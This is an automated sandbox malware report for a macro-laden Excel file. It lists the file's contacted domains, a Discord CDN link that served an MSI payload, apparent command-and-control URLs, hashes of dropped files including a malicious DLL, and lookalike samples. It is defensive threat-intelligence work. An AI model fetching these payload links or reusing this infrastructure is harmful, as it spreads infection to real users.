          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://servername/isapibackend.dll0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          adimadimingilizce.com
          		192.0.78.25
          		truetrue
            		unknown
            cdn.discordapp.com
            		162.159.129.233
            		truefalse
              		high
              www.destek-taleplerimiz.com
              		99.83.154.118
              		truetrue
                		unknown
                111bjs.com
                		34.102.136.180
                		truetrue
                  		unknown
                  www.adimadimingilizce.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.duoteshop.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.111bjs.com
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        www.111bjs.com/ccr/true
                        • Avira URL Cloud: malware
                        		low
                        http://www.adimadimingilizce.com/ccr/?y4O4=T9ggCBMXA5kAUDbc6O9tV0ryY3konbkqBjEqxZCv5OYSRYyBdrwjx1uFIWjpE/1JsOmiOw==&pHE=kv2pMLCxOntrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.destek-taleplerimiz.com/ccr/?y4O4=cWavVGQKmIqDppXzWyVy8r7Kst7Id+XyOUJHTBkcFhMzlMGfnIsimvg2OkFJfjv7X60kTQ==&pHE=kv2pMLCxOntrue
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                          		high
                          http://investor.msn.comexplorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                            		high
                            http://www.msnbc.com/news/ticker.txtexplorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.MSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpfalse
                                		high
                                http://wellformedweb.org/CommentAPI/msiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpfalse
                                  		high
                                  https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msimsiexec.exe, 00000004.00000002.2097975295.0000000000330000.00000004.00000020.sdmp, msiexec.exe, 00000004.00000002.2098042878.00000000003BA000.00000004.00000020.sdmpfalse
                                    		high
                                    https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnmsiexec.exe, 00000004.00000002.2098087183.0000000000566000.00000004.00000001.sdmp, msiexec.exe, 00000004.00000002.2098074405.0000000000466000.00000004.00000001.sdmpfalse
                                      		high
                                      http://investor.msn.com/explorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                                        		high
                                        http://www.iis.fhg.de/audioPAmsiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.piriform.com/ccleanerexplorer.exe, 00000008.00000000.2112003185.000000000856E000.00000004.00000001.sdmpfalse
                                          		high
                                          http://computername/printers/printername/.printermsiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		low
                                          http://www.%s.comPAMSID8B1.tmp, 00000006.00000002.2096383823.00000000020A0000.00000002.00000001.sdmp, explorer.exe, 00000008.00000002.2344296139.0000000001C70000.00000002.00000001.sdmpfalse
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          • URL Reputation: safe
                                          		low
                                          http://www.hotmail.com/oeexplorer.exe, 00000008.00000000.2101904624.0000000003C40000.00000002.00000001.sdmpfalse
                                            		high
                                            http://treyresearch.netmsiexec.exe, 00000004.00000002.2099468075.0000000003130000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            http://servername/isapibackend.dllexplorer.exe, 00000008.00000000.2107572712.0000000004F30000.00000002.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		low
                                            https://cdn.discordapp.com/attachments/811153215172509738/838717453038125086/009213.msi/qnGmsiexec.exe, 00000004.00000002.2097965804.0000000000324000.00000004.00000040.sdmpfalse
                                              		high

                                              Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public

                                              IPDomainCountryFlagASNASN NameMalicious
                                              192.0.78.25
                                              		adimadimingilizce.comUnited States
                                              		2635AUTOMATTICUStrue
                                              99.83.154.118
                                              		www.destek-taleplerimiz.comUnited States
                                              		16509AMAZON-02UStrue

                                              General Information

                                              Joe Sandbox Version:32.0.0 Black Diamond
                                              Analysis ID:402839
                                              Start date:03.05.2021
                                              Start time:14:40:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 9m 38s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Sample file name:0d69e4f6_by_Libranalysis (renamed file extension from none to xls)
                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                              Number of analysed new started processes analysed:12
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:1
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • HDC enabled
                                              • GSI enabled (VBA)
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Detection:MAL
                                              Classification:mal100.troj.expl.evad.winXLS@12/4@6/2
                                              EGA Information:Failed
                                              HDC Information:
                                              • Successful, ratio: 33% (good quality ratio 31.6%)
                                              • Quality average: 75.6%
                                              • Quality standard deviation: 25.5%
                                              HCA Information:
                                              • Successful, ratio: 98%
                                              • Number of executed functions: 56
                                              • Number of non-executed functions: 87
                                              Cookbook Comments:
                                              • Adjust boot time
                                              • Enable AMSI
                                              • Changed system and user locale, location and keyboard layout to English - United States
                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                              • Attach to Office via COM
                                              • Scroll down
                                              • Close Viewer

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              14:40:39API Interceptor63x Sleep call for process: msiexec.exe modified
                                              14:40:44API Interceptor117x Sleep call for process: MSID8B1.tmp modified
                                              14:41:10API Interceptor229x Sleep call for process: wininit.exe modified
                                              14:41:43API Interceptor1x Sleep call for process: explorer.exe modified

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              192.0.78.25wMqdemYyHm.exeGet hashmaliciousBrowse
                                              • www.mariacolom.net/f0sg/?7n0lqHm=AymEOqKXV1chl8iQYgJ3uquKzbaTRejMwBVZPwqkc2a5oMJioVLywtrs+1kTDlzhFYWt&CP=chrxU
                                              MSUtbPjUGib2dvd.exeGet hashmaliciousBrowse
                                              • www.theeconomicalmillennial.com/ffy/?-Z1hnrG=LKzXTzQzAW62bakJWBTKGsXtco2vSeK+LB7ryfsB0EObM+MwqUwTrLh5ElP1zwE4uPh9&2d0=lnxdA
                                              PROFORMA INVOICE-INV393456434.pdf.exeGet hashmaliciousBrowse
                                              • www.exafeprods.com/sbqi/?QPdT=wlXNghr8E5DBrABF7PUJ5OZBbAz3HWA6A4d9F/DKLZM4PCK20Ia3HOsX74YqnMTWqQvc&nzrT8h=5jRDMLpHNB
                                              PO_29_00412.exeGet hashmaliciousBrowse
                                              • www.thevillaflora.com/hw6d/?rVEt3p=S0D0v04&SPx=N8T6HUVrx9rRdb/j5XhVNb6z86Vd/RUNSBbCMa2WOSBZ+Hf+0g8ju4CxDHweU92bftmwluo5xg==
                                              ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                              • www.edithblanco.com/b3gc/?ARn=vYB5T5iqfyqejgEQl1l0Dj2yWCwTz0bR5VrqFwdqJE7Zyc+/6nKJEet/ZYp7lBTYqLXP&ndkHzH=-Z20XnRx36xD
                                              PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                              • www.helmutbuntjer.com/o86d/?Yn=f4CIh52BCvuV4AgMKYBtNzllunOhcH1VRANY9wSd3mBWXFy5KGoMvsJ/sINxatlNXpAr&RR=Y4ClpHwHA4lh6FF
                                              Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                              • www.avondalevotes.com/o86d/?GPTl=l7PM0no/7ZHx5mjX60jpj0VJL/9K6f55RKcqNG9asLbFj/lGQ4f0PxJ7PsdijTvnBO1aie26Zg==&BlB=O2JthfYxo
                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?NtTdXn=wXL40t9Hkrxhn&KtxL=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE
                                              order drawing 101.exeGet hashmaliciousBrowse
                                              • www.yashasvsaluja.com/ma3c/?GV_P=8pDpKpNHoZ_dLx&R2JlOJ=avNb7mifsq7rzXY8Hv21gXyNWEz5WOIpKihV+epsdLtVD9yeW0B30T6y1OCLtvf/9IHx
                                              SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                              • www.tiffanymcolston.com/uwec/?Rl4=YVFTx4yh&GFQl9jnp=kga628dAwNTqX66vfbKck2tgviC/7qfZNTCNV9C4sYy0SIyacyre6zaFI8CRfaI5nkXs
                                              Remittance advice.exeGet hashmaliciousBrowse
                                              • www.thecurmudgeonsspeakout.com/hx3a/?Qvu=JlMpoPIhNtr&ypkhVn5X=N0FC+tc54bmf/JTH8xH+aqzgdWsf4nLwonNH3Nnbm+D+dFZXfSyDwY+xYHMjgyeY5i7A4XmUfQ==
                                              INV#609-005.PDF.exeGet hashmaliciousBrowse
                                              • www.jianavictoriaospina.com/ve9m/?vPDhx=DZP7uK4y6p96OiK9OQfW5fpj5QQuD/WNsLlhMYSSKSRyKM12FYSY3B1XGCeHwPMCGRx8&kfL8ap=F6AlIfF8e4F
                                              s6G3ZtvHZg.exeGet hashmaliciousBrowse
                                              • www.emmajanetracy.com/iu4d/?uVjL=M6NHp&J6A=JOOHHYcCVAiumnatH9FSz+DjDh0K1BlAW5euFZ4O/VfuOjdNwQJji3cnAkHedg7IWrAc+UUQ6A==
                                              g2qwgG2xbe.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?Ezut_6Ph=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&lhuLO=TxllZ2B
                                              12042021493876783,xlsx.exeGet hashmaliciousBrowse
                                              • www.thevillaflora.com/hw6d/?NTxxLxi=N8T6HUVrx9rRdb/j5XhVNb6z86Vd/RUNSBbCMa2WOSBZ+Hf+0g8ju4CxDHwnLMWYR763luo+iQ==&Cj9LK=9rjlL0C
                                              Customer-100912288113.xlsxGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?YPxxw=JxlLiTVHLV_&4h=d2NgnqRXaD3590PSrSeXKrGILlrAeXd0mpzt/HUKTHCMsqjNpHqiPppP981n7+M4uf60sw==
                                              vbc.exeGet hashmaliciousBrowse
                                              • www.regalparkllc.com/nnmd/?VRNp=wBZl4vkh1&MvdD=tTl8v8g035m6yKE51UQNVvYPTgelaUE7gWj9K32eZH50WSszu74cxmO0I8K07RzhCUDK
                                              RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                              • www.619savage.store/uwec/?CZ6=7nExZbW&v2=UXtrAnkUbxIt7Da+co89vc/yvelnirGGdixyijtvmiG0dXcVjZHX+cHMX+KvBOjcxYq/
                                              yQh96Jd6TZ.exeGet hashmaliciousBrowse
                                              • www.longdoggy.net/vu9b/?OV0xlV=NeJ6fTW54FiVLomARoXtZYU3dCbrOkLIBtzKWj45EW4cSvDsCI/Ad3ky2rZtS/Pp2iNH&wh=jL0xYFb0mbwHi
                                              g0g865fQ2S.exeGet hashmaliciousBrowse
                                              • www.micheldrake.com/p2io/?4h3=d2NgnqRSaE399kDepSeXKrGILlrAeXd0mpr9jEILXnCNsbPLuX7uZtRN+ZZx/uILlcnE&vTapK=LJBpc8p
                                              99.83.154.118shipping document pdf.exeGet hashmaliciousBrowse
                                              • www.kcgertfarm.com/htl/?_6Ax4N=YJE87vjpATZ&QFQL4Z=Y7TDP+px4JC/SSqVeQPAJJ3lS8rxz+cXHWUOWGnTGVC5LdKUNGbP50uDVhtUgmD5Xmz46i5nLA==
                                              lBXZjiCuW0.exeGet hashmaliciousBrowse
                                              • www.mythree-informationupdates.com/njhr/?uZWx=/zO4UNfgdHCPEreRZ95iML5TdeDdCZBMXXzBOiwQzcrtbsVzRUIeP21tWMjEhMv1ee9K&9r6LE=FbYDOl6

                                              Domains

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              cdn.discordapp.com6de2089f_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              Almadeena-Bakery-005445536555665445.scr.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              To1sRo1E8P.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              wNgiGmsOwT.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              BhTxt5BUvy.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              rSYbV3jx0K.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              04282021.DOC.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              SkKcQaHEB8.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              P20200107.DOCGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              FBRO ORDER SHEET - YATSAL SUMMER 2021.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              New order.04272021.DOC.exeGet hashmaliciousBrowse
                                              • 162.159.134.233
                                              Payment-Confirmation_Copy.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              Q264003.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              Camscanner.New Order.09878766.exeGet hashmaliciousBrowse
                                              • 162.159.135.233
                                              doc07621220210416113300.exeGet hashmaliciousBrowse
                                              • 162.159.129.233
                                              REF # 166060421.docGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              File Attached.exeGet hashmaliciousBrowse
                                              • 162.159.133.233
                                              SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              SKM_C258 Up21042213080.exeGet hashmaliciousBrowse
                                              • 162.159.130.233
                                              G019 & G022 SPEC SHEET.exeGet hashmaliciousBrowse
                                              • 162.159.130.233

                                              ASN

                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                              AUTOMATTICUSwMqdemYyHm.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              MSUtbPjUGib2dvd.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              PROFORMA INVOICE-INV393456434.pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              agnesng@hanglung.comOnedrive.htmlGet hashmaliciousBrowse
                                              • 192.0.77.2
                                              PO_29_00412.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                              • 192.0.66.2
                                              Enrollment_Benefits-2022.docxGet hashmaliciousBrowse
                                              • 192.0.66.2
                                              DVO100024000.docGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              ofert#U0103 comand#U0103 de cump#U0103rare_pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              Rio International LLC URGENT REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              RDAx9iDSEL.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              order drawing 101.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              lFfDzzZYTl.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              SWIFT COPY.exeGet hashmaliciousBrowse
                                              • 192.0.78.246
                                              win32.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              regasm.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              Remittance advice.exeGet hashmaliciousBrowse
                                              • 192.0.78.25
                                              oEWV80rj6fgwF5i.exeGet hashmaliciousBrowse
                                              • 192.0.78.24
                                              AMAZON-02USd630fc19_by_Libranalysis.xlsxGet hashmaliciousBrowse
                                              • 52.219.40.51
                                              presupuesto.xlsxGet hashmaliciousBrowse
                                              • 143.204.202.49
                                              Comand#U0103 de achizi#U021bie PP050321.exeGet hashmaliciousBrowse
                                              • 3.34.241.29
                                              O1E623TjjW.exeGet hashmaliciousBrowse
                                              • 52.52.155.86
                                              file.exeGet hashmaliciousBrowse
                                              • 52.15.160.167
                                              PURCHASE ORDER.exeGet hashmaliciousBrowse
                                              • 3.14.18.91
                                              80896e11_by_Libranalysis.exeGet hashmaliciousBrowse
                                              • 3.141.142.211
                                              QxnqOxC0qE.exeGet hashmaliciousBrowse
                                              • 52.14.161.64
                                              ETC-B72-LT-0149-03-AR.exeGet hashmaliciousBrowse
                                              • 3.34.241.29
                                              DocNo2300058329.doc__.rtfGet hashmaliciousBrowse
                                              • 99.86.2.5
                                              nT7K5GG5kmGet hashmaliciousBrowse
                                              • 35.155.184.95
                                              Bill Of Lading & Packing List.pdf.gz.exeGet hashmaliciousBrowse
                                              • 99.83.224.11
                                              fI1YXJEuz5.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              wSBbLKrAti.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              qRTSlJsJb7.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              j3Y709Q8wv.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              QibTWFydoZ.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              J99vIX30UF.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              CMj5f279cs.exeGet hashmaliciousBrowse
                                              • 99.83.154.118
                                              Nkef9ryisT.exeGet hashmaliciousBrowse
                                              • 99.83.154.118

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\AppData\Local\Temp\64cgbfdn23gia0
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):6661
                                              Entropy (8bit):7.469743146526507
                                              Encrypted:false
                                              SSDEEP:96:ilvxI1BNLSkmzO+Q9nKNG1yUieQpH22BcxZl176Y1g7ibEyykBw2+Io3:ihxCmU2G1yDRi6D7ibEAa2+n
                                              MD5:452DCF954B6B913EF5CA0E206051C180
                                              SHA1:DC436B4BB30477ADDE34685EA17F9DBC3E051269
                                              SHA-256:3EFC04F6A63F01436C128AEEB60607FC0CC45A25463EC523ADCB801681892D07
                                              SHA-512:3442FCB88CB1766A4B541FA02B0395A4CCF942F774DB0F1420FBA0C0AA9101F594F18CDDC19AB1EC874B52AE91941A6270FDDB00B88336B19A91E066B063548B
                                              Malicious:false
                                              Reputation:low
                                              Preview: .....]..igA.Q-...B..Y....sM.V.-.S..R.9..S-.S.u.FN=..NFNZ.9R.HFV\.y.w4.B0m......N.q......>.0em....HZ.\Qy........]M.....+>4QQ6...t.Bpem ...hk6|q.....T."P.m.... Y.$Q.....4B"......(!6<..{{w.\.yD.ww0G^0qM.....M..."..Y&H?.\.9hHY..Q-F4j".E.x.="$E.~..>4Q..`NN0Qm.4FB0mMxT.b|.Yv..PqMxT..0emR...H!.\Qy.....Wb.......j>4QQ.ccw.<B.emjww{..6.q.L.....".m.... Y.$QA....4.".EM....(!6<1Y$...4bB0..V...0Y^Tqqx...+.d..z...Hj........4.ey....>.....(F.....{j.dcw~....Q-.N.._..].~#...qM.....=.3...Qm"...&........B...Mmb...r.N'..Q..e*...q^...Rr-...i.B...9.2[..I...NZ......&....{.b....Q.nFT..{].f....q......l.m..=......e-ZN.z..i.26..z>.....Qm....~.-..y-RF.=.>.....q.....y..{1...9.Q."...S......q^Or*...v+?....be...Q-"SM.sNJq.....sM.sV.Q..gM..g.....;..A._...S.8[..j.-.......oa.:o9.q.^...~..........4.zy.=...z.~OZN..nEFZZ......|wwj....2...4......=.6.....F.]6...m.I..-....y.......EM......}...b.....Q...;..h.T..Y.J.........=...>..m.I...\NZ.....l...g...j.....w.zw..R.....Y.i..^.m.... .>.
                                              C:\Users\user\AppData\Local\Temp\h5zr3pu7px
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):186368
                                              Entropy (8bit):7.999094427295739
                                              Encrypted:true
                                              SSDEEP:3072:9HeCZ6w4ulLMJZvUsLVHXWUG6gvzUJQgHVi6ODuWNHoUhrjHMeYMNZya65:xtkoCvUshHXWUG6oyRi6OTNIU1jHMeYB
                                              MD5:E5B5F2A86B12D2DFBE61D5F77763BE2A
                                              SHA1:1E7B0F696748E3966440A24B6F6393AA76AA4B3F
                                              SHA-256:4C93439D859610B909FB82A8D55C228C1523DB9BBA3D83566D3360A202C7899E
                                              SHA-512:9EA0E54DD150511B4591322A685FB325D1E8A24FBF5F619E60FBBDCB967393489FF7463E4D29641A395A602475183AF3CB37483E12CCB0733544FE38BF2A92AA
                                              Malicious:false
                                              Reputation:low
                                              Preview: ..6%.@..]S...u...f..g@.o....D.`...6...]...s......9JL..."5 .t...8....h-[%.].VcX.m.:DI..a..w...t......I..ic.Z......B.z.(.W....VD.D.G.5..(;X[..l.>.5Z..n.bI.o....B.}V2......e..^r......?.W..pR<mGJ....,.......r....1e......u.. ..G..J..JI....w.!z?ej{...0..?.g..c...|.....Q".s...e...Y.T..rU..;..f.ye.`...<t.g.|.\_....%.."..P._...."....}B.2...>.y..mi#......B..x,...o~.'.R.D9Dwl.#.:/.c.h"..3.....e..].j..b.h.>....SGm..U/A$..w$r.....MZ..x....>....C=..vjcJ....-.B..uy.l!!.......}..+..vz....%8Ud.,`....I]L...4..~..3..9*.x...H..%........6.`.:.5]/bnL.Y6...B.su.e.0....E..........?.M.X.._.A.....,SCL..R...^1!J..v....d.....c.rN.C8...$.Y....F..P..X...,..00......-.gJ.wF:.a.O...*.V......<.b.mU..........l...]....g:o....[.f....mM#|.:.0...Q&RK.'.2.iK.....ii.v.k.:.,z..h@p....X3G53;...>./%..;EiA.C.<.gO.Y..0...`l.iK...6.+.......vs...m..0..2..*D.X.Q...Po....~.....q$.$.Y$..5..#Ps.._..z.".V.S....W.L....k*TL.....O%5@.....(...|.O_.I..g.B.w.Gp......M..[..!..$..e@.J.1.CL.9..yKV.......0+<oI...
                                              C:\Users\user\AppData\Local\Temp\nsjB879.tmp\5rov.dll
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):5120
                                              Entropy (8bit):4.381810561586193
                                              Encrypted:false
                                              SSDEEP:48:ai90fn1ASkT3/NDZbitP8X3V9TJ6F2YvRUq1nh/SS72+DtMYquSzieLqRuqS:/On1ASkLNDZ+tq9m20RLf2otsJzUx
                                              MD5:684720049DCA3DEFA172BF93F56012D2
                                              SHA1:C77657F31828F1683462D67C30C33DC3EF84D6D4
                                              SHA-256:658E0AC49C51AB8EEFE51A1790F9B0A43E9CF7495E66334411F53A5C7200734B
                                              SHA-512:924CD7A7E8617EB8A4E5D70EE6407F1535B11F34B6BD7228683464EDDDBE2A49FEA1DAFA2B25E7E7B16446A14E7246560E37B622B3968AD01025AA7041263F6B
                                              Malicious:true
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n"...L..L..L..gH..L.dM..L..M..L..fH..L..fL..L..f...L..fN..L.Rich..L.................PE..L.....`...........!......................... ...............................P......................................`!..P....".......@............................... ............................... ..@............ ...............................text...r........................... ..`.rdata..".... ......................@..@.data...D....0......................@....rsrc........@......................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                              C:\Users\user\AppData\Local\Temp\nszB83A.tmp
                                              Process:C:\Windows\Installer\MSID8B1.tmp
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):201776
                                              Entropy (8bit):7.954384945910277
                                              Encrypted:false
                                              SSDEEP:6144:v5tkoCvUshHXWUG6oyRi6OTNIU1jHMeYMDy:RPsh5XXRYTrjHdj
                                              MD5:AC93D1A09D287B234C11E01BA73D7000
                                              SHA1:C5C1E2CD3B96B6F0B38565C05CA0C40D65EB4591
                                              SHA-256:4F5A7AE7A3059308D3B5FF9EE0918B1FE215FB0EF8D00EA2A7399A4F2E14EBE1
                                              SHA-512:B8A315320555BDED845AD2AF2D7FEF6043E422AD3BFB2E42DFE071DCD2EB80638215BE8BE39EE39B5EFB325A1567DEBC377ADC804AFCA54587AC809454E6AD9B
                                              Malicious:false
                                              Reputation:low
                                              Preview: ........,...............................5...................................................................................................................................................................................................................................................J...................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: HP, Last Saved By: HP, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon May 3 11:10:40 2021, Last Saved Time/Date: Mon May 3 11:10:40 2021, Security: 0
                                              Entropy (8bit):4.927898650848454
                                              TrID:
                                              • Microsoft Excel sheet (30009/1) 47.99%
                                              • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                              • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                              File name:0d69e4f6_by_Libranalysis.xls
                                              File size:38912
                                              MD5:0d69e4f684735cf4f187659ee0882fd8
                                              SHA1:55a52f6971084224e3030b76cd44d13b0203b749
                                              SHA256:0c856e57da034a8943b4065297d075365090d9eb925abb7ba74dd3df9acefc1f
                                              SHA512:9bfc38689030d9100a52d192ffacf7afcf82ec64b40bb34613adaa109c1557959123ee4c261b4becaed28b99c28044cd410dc3f82fc18ab82276311e40464647
                                              SSDEEP:768:tck3hOdsylKlgryzc4bNhZFGzE+cL2knAJ0OiCgCvVKQ29CYubyfe:ik3hOdsylKlgryzc4bNhZFGzE+cL2kne
                                              File Content Preview:........................>..................................."..................................................................................................................................................................................................

                                              File Icon

                                              Icon Hash:e4eea286a4b4bcb4

                                              Static OLE Info

                                              General

                                              Document Type:OLE
                                              Number of OLE Files:1

                                              OLE File "0d69e4f6_by_Libranalysis.xls"

                                              Indicators

                                              Has Summary Info:True
                                              Application Name:Microsoft Excel
                                              Encrypted Document:False
                                              Contains Word Document Stream:False
                                              Contains Workbook/Book Stream:True
                                              Contains PowerPoint Document Stream:False
                                              Contains Visio Document Stream:False
                                              Contains ObjectPool Stream:
                                              Flash Objects Count:
                                              Contains VBA Macros:True

                                              Summary

                                              Code Page:1252
                                              Author:HP
                                              Last Saved By:HP
                                              Create Time:2021-05-03 10:10:40
                                              Last Saved Time:2021-05-03 10:10:40
                                              Creating Application:Microsoft Excel
                                              Security:0

                                              Document Summary

                                              Document Code Page:1252
                                              Thumbnail Scaling Desired:False
                                              Company:gh
                                              Contains Dirty Links:False
                                              Shared Document:False
                                              Changed Hyperlinks:False
                                              Application Version:983040

                                              Streams with VBA

                                              VBA File Name: AK2_oiMjTt8L.bas, Stream Size: 6925
                                              General
                                              Stream Path:_VBA_PROJECT_CUR/VBA/AK2_oiMjTt8L
                                              VBA File Name:AK2_oiMjTt8L.bas
                                              Stream Size:6925
                                              Data ASCII:. . . . . . . . . 2 . . . . . . . . . . . . . . . a . . . M . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                              Data Raw:01 16 03 00 03 f0 00 00 00 32 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 61 05 00 00 4d 10 00 00 00 00 00 00 01 00 00 00 ba 19 41 8f 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                              VBA Code Keywords

                                              Keyword
